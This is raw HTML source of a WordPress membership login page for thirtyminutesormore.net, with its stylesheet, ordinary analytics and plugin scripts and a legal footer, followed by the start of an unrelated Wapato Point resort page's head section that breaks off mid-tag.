1.8rem;margin-bottom: 0;font-family: 'Open Sans', sans-serif !important;font-weight: 400;margin: 0 0 10px;font-size:19px!important;} .page-template-LFSL-Modular .bSe.fullWidth .awr p, .page-template-LFSL-Modular .bSe.fullWidth .awr li {line-height: 1.8rem;margin-bottom: 0;font-family: 'Open Sans', sans-serif !important;font-weight: 400;margin: 0 0 10px;font-size:19px!important;} .page-template-LFSL-Modular .bSe.fullWidth .awr p span {font-family: 'Open Sans', sans-serif !important;}.page-template-benchmark-lfsl .wrp.cnt .bSe.fullWidth .awr p {margin-bottom: 10px;}.page-template-benchmark-lfsl .wrp.cnt p#heading span, .page-template-benchmark-lfsl .wrp.cnt span.fancy-red, .page-template-benchmark-lfsla-inactive #heading span {text-align: center !important;color: #000 !important;line-height: 2.7rem !important;font-family: 'Oswald', sans-serif !important;font-size: 32px !important;font-weight: bold !important;text-transform: uppercase !important;letter-spacing: .1rem !important;display: block;clear: both;}.page-template-LFSL-Modular #heading span {text-align: center !important;line-height: 2.7rem !important;font-family: 'Oswald', sans-serif !important;font-size: 32px !important;font-weight: bold !important;text-transform: uppercase !important;letter-spacing: .1rem !important;display: block;clear: both;}.page-template-LFSL-Modular #heading span {font-size: 40px !important;}.page-template-benchmark-lfsla-inactive #heading span {text-align: left !important;}.page-template-benchmark-lfsla-inactive ul.greencheck2 li {margin-left: 3rem !important;list-style: none;}.page-template-benchmark-lfsl .wrp.cnt p#heading.first span, .page-template-benchmark-lfsla-inactive .block001 #heading-first, .page-template-LFSL-Modular .first span span {text-align: center !important;color: #000 !important;font-family: 'Oswald', sans-serif !important;font-size: 4.1em !important;font-weight: bold !important;text-transform: uppercase !important;margin-bottom: 2rem !important;}.page-template-benchmark-lfsla-inactive .block001 #heading-first {padding-top: 1rem !important;margin-top: 1rem !important;}.page-template-benchmark-lfsla-inactive .block001 #heading-first span {font-family: 'Oswald', sans-serif !important;line-height: 6rem !important;}.page-template-benchmark-lfsl .container {background: #fff;}.page-template-benchmark-lfsla-inactive .block001 {background: #F3F3F3;}.page-template-benchmark-lfsl .cnt .bSe article {margin: 0;}.page-template-benchmark-lfsl .button-new {margin-bottom: 1rem;}.page-template-benchmark-lfsl .button-new a, .page-template-benchmark-lfsl .button-new a:hover, .page-template-benchmark-lfsla-inactive a {text-decoration: none;}.page-template-benchmark-lfsl .button-ifsla, .page-template-benchmark-lfsl .button-ifsla:hover, .page-template-benchmark-lfsla-inactive .button-ifsla, .page-template-benchmark-lfsla-inactive .button-ifsla:hover {background: #2998F9;border-radius: 8px;font-family: 'Oswald', sans-serif;font-size: 2.5em;font-weight: 700;display: block;text-align: center;margin: 0 auto;padding: 10px 38px 10px 40px;width: fit-content;line-height: 3.8rem;box-shadow: 5px 5px 0px #0087b5;text-transform: uppercase;text-decoration: none;color: #fff !important;}.page-template-benchmark-lfsl .button-ifsla, .page-template-benchmark-lfsl .button-ifsla:hover {clear: both;}.page-template-benchmark-lfsl .wrp.cnt p#heading.first span {line-height: 5rem !important;}.page-template-benchmark-lfsl .last {margin-bottom:2rem;}@media screen and (min-width: 1200px) {.page-template-benchmark-lfsl .container {width: 860px !important;}.page-template-benchmark-lfsla-inactive .block001 .container {max-width: 860px;}}@media screen and (max-width: 768px) {.page-template-benchmark-lfsl .button-ifsla, .page-template-benchmark-lfsl .button-ifsla:hover {clear: both;width: inherit;}}.page-template-benchmark-lfsl .wrp.cnt p#heading.extraheading span {font-size: 2.3em !important;}.page-template-benchmark-lfsl .wrp.cnt ul.greencheck2 li:before, .page-template-benchmark-lfsl .wrp.cnt ul.greencheck1 li:before, .page-template-benchmark-lfsla-inactive ul.greencheck2 li:before {content: '\f00c' !important;color: #3366FF;font-size: 20px;font-family: fontawesome;}.page-template-benchmark-lfsla-inactive ul.greencheck2 li:before {margin-right: .5rem;}@media screen and (min-width: 2000px){.page-template-LFSL-Modular section.bSe.fullWidth {width: 1140px;margin: 0 auto;}body.page-template-LFSL-Modular {background: #fbfbfb;}} /*custom css*/ .custom .blackcolor {color: #000;}.custom .bluecolor {color: #4A86E8;}.custom .redcolor {color: #D90000;}.custom .whitecolor {color: #fff;}.custom .cyancolor {color: #18e8d7;}.custom .marginauto {margin: 0 auto;}.custom .margintop1rem {margin-top: 1rem;}.custom .textaligncenter {text-align:center;}.custom .textalignleft {text-align:left;}.custom .textalignright {text-align:right;}.custom .underline {text-decoration:underline;}.custom .roboto {font-family: roboto,Arial,sans-serif;}.custom .bold {font-weight:bold;}.custom .darkblue {color: #285478;}.custom .oneem {font-size: 1em;}.custom .pointeightem {font-size: .8em;}.custom .onepointfiveem {font-size: 1.5em;}.custom .twoem {font-size: 2em;}.custom .twopointfiveem {font-size: 2.5em;}.custom .threeem {font-size: 3em;}.custom .block {display:block;}.custom .width100 {width:100%;}.custom .both {clear:both;}.custom .floatleft {float:left;}.custom .margintopzero {margin-top:0;}.custom .marginbottomzero {margin-bottom:0;}.custom .marginbottomonerem {margin-bottom:1rem;}.custom .marginbottomtworem {margin-bottom:2rem;}.custom .margintoponerem {margin-top:1rem;}.custom .margintoptworem {margin-top:2rem;}.custom .margintopfourrem {margin-top:4rem;}.custom .marginbottomonepointfiverem {margin-bottom:1.5rem;}.custom .paddingtopzero {padding-top:0;}.custom .paddingbottomzero {padding-bottom:0;}.custom .paddingbottomonerem {padding-bottom:1rem;}.custom .paddingbottomtworem {padding-bottom:2rem;}.custom .paddingtoponerem {padding-top:1rem;}.custom .paddingtoptworem {padding-top:2rem;}.custom .paddingtopfourrem {padding-top:4rem;}.custom .fontweightnormal {font-weight:normal;}.custom .lineheightonerem {line-height:1rem;}.custom .lineheighttworem {line-height:2rem;}.custom .lineheightthreerem {line-height:3rem;}.custom .lineheightfourrem {line-height:4rem;} </style> </head> <body class="home page-template-default page page-id-28"> <div class="fx-b "></div> <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-NSHMHT6" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <div class="h-b h-d" id="floating_menu"> <div class="wrp"> <div class="mobile-navbar" style="display:none;"> <button> <span></span> <span></span> <span></span> </button> <a href="https://www.thirtyminutesormore.net/"><img src="https://www.thirtyminutesormore.net/wp-content/themes/storied/inc/images/logo.png" alt="" /></a> </div> <div class="mobile-mask"></div> <header class="side"> <div id="logo"> <a href="https://www.thirtyminutesormore.net/"><img src="https://www.thirtyminutesormore.net/wp-content/themes/storied/inc/images/logo.png"></a> </div> <div class="m-s"> <div class="m-si" style=""> <div class="m-sb"> <nav class="menu-main-menu-container"><ul id="menu-main-menu" class="menu"><li id="menu-item-328" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home toplvl"><a href="https://www.thirtyminutesormore.net/">Login</a></li> </ul></nav> </div> </div> </div> </header> </div> </div> <div class="wrp cnt"> <section class="bSe fullWidth"> <article> <div class="awr-e"> <div class="awr"> <h1 class="entry-title"> Login </h1> <div class="m-f"> <div class="meta"> <div class="met met-a" style='display:none;'> <a href="https://www.thirtyminutesormore.net/#comments">0 comments</a> </div> </div> <div class="clear"></div> </div> <p><center><strong><span style="font-size: x-large;">Enter Your Username<br /> and<br /> Password Below<br /> To Access Your Programs</span></strong></center></p> <div class="box-content" style="text-align: center;"> <form id="loginform" action="/wp-login.php" method="post" name="loginform"> <p><label for="user_login">Username<br /> <input name="log" size="20" type="text" value="" class="input" /></label></p> <p><label for="user_pass">Password<br /> <input name="pwd" size="20" type="password" value="" class="input" /></label></p> <p class="forgetmenot"><label for="rememberme"><input name="rememberme" type="checkbox" value="forever" /> Remember Me</label></p> <p class="submit"><input name="wp-submit" type="submit" value="Log In" class="button-primary" /><input name="redirect_to" type="hidden" value="/account/" /><input name="testcookie" type="hidden" value="1" /></p> </form> </div> <div class="box-bottom" style="text-align: center;"> Having trouble? email <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="1d75787c6975786f305d307a78696f7c6d74797578716d337e7270">[email&#160;protected]</a></div> <p class="et-registration" style="text-align: center;">Lost Password? <a href=/wp-login.php?action=lostpassword>Recover via E-mail</a></p> <p>&nbsp;</p> </div> </div> </article> <article> </article> </section> </div> <div class="clear"></div> <div class="wrp"> <footer> <div class="fmm"> <div class="ft-l"> <a href="https://www.thirtyminutesormore.net/" class="fo-l"> <img src="https://www.thirtyminutesormore.net/wp-content/themes/storied/inc/images/logo.png" alt=""> </a> </div> <div class="ft-m"> <div class="fm-m"> <span class="copy"> Copyright text 2017 by ThirtyMinutesOrMore.net. </span> </div> </div> <div class="ft-s"> <div class="fsm"> <ul> </ul> </div> </div> <div class="clear"></div> </div> </footer> </div> <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="text/javascript" data-cfasync="false">function base64_encode(e){var r,t,c,a,h,n,o,A,i = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",d=0,l=0,s="",u=[];if(!e)return e;do r=e.charCodeAt(d++),t=e.charCodeAt(d++),c=e.charCodeAt(d++),A=r<<16|t<<8|c,a=A>>18&63,h=A>>12&63,n=A>>6&63,o=63&A,u[l++]=i.charAt(a)+i.charAt(h)+i.charAt(n)+i.charAt(o);while(d<e.length);s=u.join("");var C=e.length%3;return(C?s.slice(0,C-3):s)+"===".slice(C||3)} var url = base64_encode(location.protocol + '//' + location.host + location.pathname);(function() {var s = document.createElement('script');s.type = 'text/javascript';s.async = true;s.setAttribute("data-scriptid", "dfunifiedcode");s.src ="https://deadlinefunnel.com/unified/eyJpdiI6Impsc1ptZUFVVHJwZm1UeFRKT1k3emc9PSIsInZhbHVlIjoic1ZZcUFUR3FPekpQazdxTEZLQ3I4QT09IiwibWFjIjoiNzM3MGNhNDY3ZTcwZjNkYzRjYzU2OWEzZjQ4OWFiMDI2OGJkYTY0NTUxOWExZjY0ZGEwY2MyYWIxODc0Nzk1ZCJ9/"+url;var s2 = document.getElementsByTagName('script')[0];s2.parentNode.insertBefore(s, s2);})();</script> <script type="text/javascript"> jQuery(".xverify").submit(function(evt) { var res = false; thiss = jQuery(this) thiss.find(".BriteVerifyErr").remove() var email = thiss.find('[name="email"]').val() jQuery.ajax({ url: "https://www.thirtyminutesormore.net/wp-content/plugins/xverify/v.php", data: {"email":email}, type: "POST", dataType: "json", async: false, success: function(data){ if (data.error){ var err_text = "Please enter a valid email address" jQuery("<div/>", {class: "BriteVerifyErr", text: err_text}).prependTo(thiss) }else{ res = true } } }); if (res && thiss.hasClass("newclose")){ thiss.parent().parent().parent().parent().find(".et_bloom_close_button").trigger("click"); } return res; }); </script> <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-NSHMHT6" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <link rel='stylesheet' id='countdown_css-css' href='https://www.thirtyminutesormore.net/wp-content/plugins/widget-countdown/includes/style/style.css?ver=5.0.2' type='text/css' media='all' /> <link rel='stylesheet' id='dashicons-css' href='https://www.thirtyminutesormore.net/wp-includes/css/dashicons.min.css?ver=5.0.2' type='text/css' media='all' /> <link rel='stylesheet' id='thickbox-css' href='https://www.thirtyminutesormore.net/wp-includes/js/thickbox/thickbox.css?ver=5.0.2' type='text/css' media='all' /> <script type='text/javascript' src='https://www.thirtyminutesormore.net/wp-content/plugins/haiku-minimalist-audio-player/js/jquery.jplayer.min.js?v=1.90'></script> <script type='text/javascript' src='https://www.thirtyminutesormore.net/wp-content/plugins/haiku-minimalist-audio-player/js/haiku-player.js?ver=1.0.0'></script> <script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"https:\/\/www.thirtyminutesormore.net\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"}}; /* ]]> */ </script> <script type='text/javascript' src='https://www.thirtyminutesormore.net/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var ThriveApp = {"ajax_url":"https:\/\/www.thirtyminutesormore.net\/wp-admin\/admin-ajax.php","is_singular":"1","post_type":"page","lazy_load_comments":"0","comments_loaded":"0","theme_uri":"https:\/\/www.thirtyminutesormore.net\/wp-content\/themes\/storied"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.thirtyminutesormore.net/wp-content/themes/storied/js/script.js?v=1.90'></script> <script type='text/javascript'> /* <![CDATA[ */ var tve_dash_front = {"ajaxurl":"https:\/\/www.thirtyminutesormore.net\/wp-admin\/admin-ajax.php","force_ajax_send":"","is_crawler":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.thirtyminutesormore.net/wp-content/plugins/thrive-visual-editor/thrive-dashboard/js/dist/frontend.min.js?ver=2.0.76'></script> <script type='text/javascript' src='https://www.thirtyminutesormore.net/wp-includes/js/wp-embed.min.js?ver=5.0.2'></script> <script type='text/javascript' src='https://www.thirtyminutesormore.net/wp-content/plugins/handl-ultracart/js/jquery-cookie.js?v=1.90'></script> <script type='text/javascript' src='https://www.thirtyminutesormore.net/wp-content/plugins/widget-countdown/includes/javascript/front_end_js.js?ver=5.0.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var thickboxL10n = {"next":"Next >","prev":"< Prev","image":"Image","of":"of","close":"Close","noiframes":"This feature requires inline frames. You have iframes disabled or your browser does not support them.","loadingAnimation":"https:\/\/www.thirtyminutesormore.net\/wp-includes\/js\/thickbox\/loadingAnimation.gif"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.thirtyminutesormore.net/wp-includes/js/thickbox/thickbox.js?ver=3.1-20121105'></script> <img width=1 height=1 style='position:absolute' src='https://www.thirtyminutesormore.net/wp-content/plugins/logic-pro/images/lpt.php?s=%5B%5D' /><!DOCTYPE html> <html> <head> <title>Footer</title> </head> <style type="text/css"> footer, .footer-contents{ display: none; } body.bb { background-image: none !important; } .fmm { color: #fff; background: #000; padding: 50px 50px 40px 50px; /*margin-top: -30px;*/ /* z-index: 9999999999999; */ position: absolute; } .fmm p { margin: 0 0 10px; color: #fff !important; font-size: 13px !important; } </style> <body> <div class="fmm"> <div class="ft-l"> </div> <div class="ft-m"> <div class="fm-m"> <span class="copy"> <p style="text-align:center; margin-bottom: 0px; "> © 2016-2019 Calworth Glenford LLC. All Rights Reserved. All content posted on this site is commentary or opinion and is protected under Free Speech. We guard your privacy very seriously and do everything in our power to protect your anonymity, please review our <a href="https://www.thirtyminutesormore.net/privacy-policy/" target="_blank"><span style="font-weight: normal;font-size: 13px; color: #00a0ff;">Strict Privacy Policy</span></a>. Your use of this website constitutes acceptance of <a href="https://www.thirtyminutesormore.net/disclaimer/" target="_blank"><span style="font-weight: normal;font-size: 13px; color: #00a0ff;">Disclaimer</span></a>, <a href="https://www.thirtyminutesormore.net/terms-and-conditions/" target="_blank"><span style="font-weight: normal;font-size: 13px; color: #00a0ff;">Terms and Conditions</span></a>, and <a href="https://www.thirtyminutesormore.net/privacy-policy/" target="_blank"><span style="font-weight: normal;font-size: 13px; color: #00a0ff;">Privacy Policy</span></a>. You must be 18 in order to use this website. The information on this site is provided for educational and entertainment purposes only. It is not intended as a substitute for professional advice of any kind. We assume no responsibility for the use or misuse of this material. All trademarks, registered trademarks and service marks mentioned on this site are the property of their respective owners. Any products offered subject to this <a href="https://www.thirtyminutesormore.net/money-back-guarantee/" target="_blank"><span style="font-weight: normal;font-size: 13px; color: #00a0ff;">Money Back Guarantee.</span></a> <a href="https://www.thirtyminutesormore.net/contact-us/" target="_blank"><span style="font-weight: normal;font-size: 13px; color: #00a0ff;">Contact Us</span></a> </p> </span> </div> </div> <div class="ft-s"> <div class="fsm"> <ul> </ul> </div> </div> <div class="clear"></div> </div> </body> </html> </body> </html>
0
<!DOCTYPE html> <html lang="en-US" class="html_stretched responsive av-preloader-disabled av-default-lightbox html_header_top html_logo_left html_main_nav_header html_menu_right html_custom html_header_sticky html_header_shrinking html_header_topbar_active html_mobile_menu_phone html_header_searchicon_disabled html_content_align_center html_header_unstick_top html_header_stretch_disabled html_minimal_header html_av-submenu-hidden html_av-submenu-display-click html_av-overlay-side html_av-overlay-side-classic html_av-submenu-noclone html_entry_id_504 av-no-preview html_text_menu_active "> <head> <meta charset="UTF-8" /> <meta name="robots" content="index, follow" /> <!-- mobile setting --> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <!-- Scripts/CSS and wp_head hook --> <title>Wapato Point &#8211; Resort on Lake Chelan</title> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="Wapato Point &raquo; Feed" href="https://wapatopoint.com/feed/" /> <!-- google webfont font replacement --> <script type='text/javascript'> if(!document.cookie.match(/aviaPrivacyGoogleWebfontsDisabled/)){ (function() { var f = document.createElement('link'); f.type = 'text/css'; f.rel = 'stylesheet'; f.href = '//fonts.googleapis.com/css?family=Open+Sans:400,600%7CRaleway'; f.id = 'avia-google-webfont'; document.getElementsByTagName('head')[0].appendChild(f); })(); } </script> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/wapatopoint.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.1"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='avia-grid-css' href='https://wapatopoint.com/wp-content/themes/enfold/css/grid.css?ver=4.5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-base-css' href='https://wapatopoint.com/wp-content/themes/enfold/css/base.css?ver=4.5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-layout-css' href='https://wapatopoint.com/wp-content/themes/enfold/css/layout.css?ver=4.5.2' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-audioplayer-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/audio-player/audio-player.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-blog-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/blog/blog.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-postslider-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/postslider/postslider.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-button-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/buttons/buttons.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-buttonrow-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/buttonrow/buttonrow.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-button-fullwidth-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/buttons_fullwidth/buttons_fullwidth.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-catalogue-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/catalogue/catalogue.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-comments-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/comments/comments.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-contact-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/contact/contact.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-slideshow-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow/slideshow.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-slideshow-contentpartner-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/contentslider/contentslider.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-countdown-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/countdown/countdown.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-gallery-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/gallery/gallery.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-gallery-hor-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/gallery_horizontal/gallery_horizontal.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-maps-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/google_maps/google_maps.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-gridrow-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/grid_row/grid_row.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-heading-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/heading/heading.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-rotator-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/headline_rotator/headline_rotator.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-hr-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/hr/hr.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-icon-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/icon/icon.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-iconbox-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/iconbox/iconbox.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-icongrid-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/icongrid/icongrid.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-iconlist-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/iconlist/iconlist.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-image-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/image/image.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-hotspot-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/image_hotspots/image_hotspots.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-magazine-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/magazine/magazine.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-masonry-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/masonry_entries/masonry_entries.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-siteloader-css' href='https://wapatopoint.com/wp-content/themes/enfold/css/avia-snippet-site-preloader.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-menu-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/menu/menu.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-modfule-notification-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/notification/notification.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-numbers-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/numbers/numbers.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-portfolio-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/portfolio/portfolio.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-progress-bar-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/progressbar/progressbar.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-promobox-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/promobox/promobox.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-sc-search-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/search/search.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-slideshow-accordion-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_accordion/slideshow_accordion.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-slideshow-feature-image-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_feature_image/slideshow_feature_image.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-slideshow-fullsize-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_fullsize/slideshow_fullsize.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-slideshow-fullscreen-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_fullscreen/slideshow_fullscreen.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-slideshow-ls-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow_layerslider/slideshow_layerslider.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-social-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/social_share/social_share.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-tabsection-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/tab_section/tab_section.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-table-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/table/table.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-tabs-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/tabs/tabs.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-team-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/team/team.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-testimonials-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/testimonials/testimonials.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-timeline-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/timeline/timeline.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-toggles-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/toggles/toggles.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='avia-module-video-css' href='https://wapatopoint.com/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/video/video.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='wp-block-library-css' href='https://wapatopoint.com/wp-includes/css/dist/block-library/style.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='rs-plugin-settings-css' 